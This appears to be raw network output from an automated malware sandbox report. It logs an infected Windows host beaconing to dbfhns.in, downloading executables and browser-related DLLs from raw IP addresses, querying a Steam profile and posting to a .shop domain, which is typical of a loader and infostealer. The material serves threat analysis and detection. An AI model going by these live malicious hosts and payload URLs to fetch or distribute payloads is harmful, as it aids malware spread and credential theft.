Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eaiecpphhehnp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ohbpdxbbqxsqjiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://thknwrjryktui.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic	HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mrnhbbwrygn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uhruuiuofju.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gdrusktiywhw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dswkxseehrq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://etlthdykpik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://urrnadxnpwvv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hnoddeyuysdltft.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://djnjnheylgenw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mvirbkubtmy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ukxbtouqvjwpgrb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lttuitxyemp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://haljhouhmvighpi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bkjyrxsoflynogyv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iymhuqeqmdev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rscrbtwfrpl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://feebaxojoajqvghx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://flowliaawjqccjvx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dnklpspcfvmivsa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://juuhlbwtemhw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uipcoqrcfmpaso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: dbfhns.in

Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6CFACC60 PR_Recv,

9_2_6CFACC60

Source: global traffic	HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic	HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic	HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic	HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231

Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: dbfhns.in
Source: global traffic	DNS traffic detected: DNS query: whispedwoodmoodsksl.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC 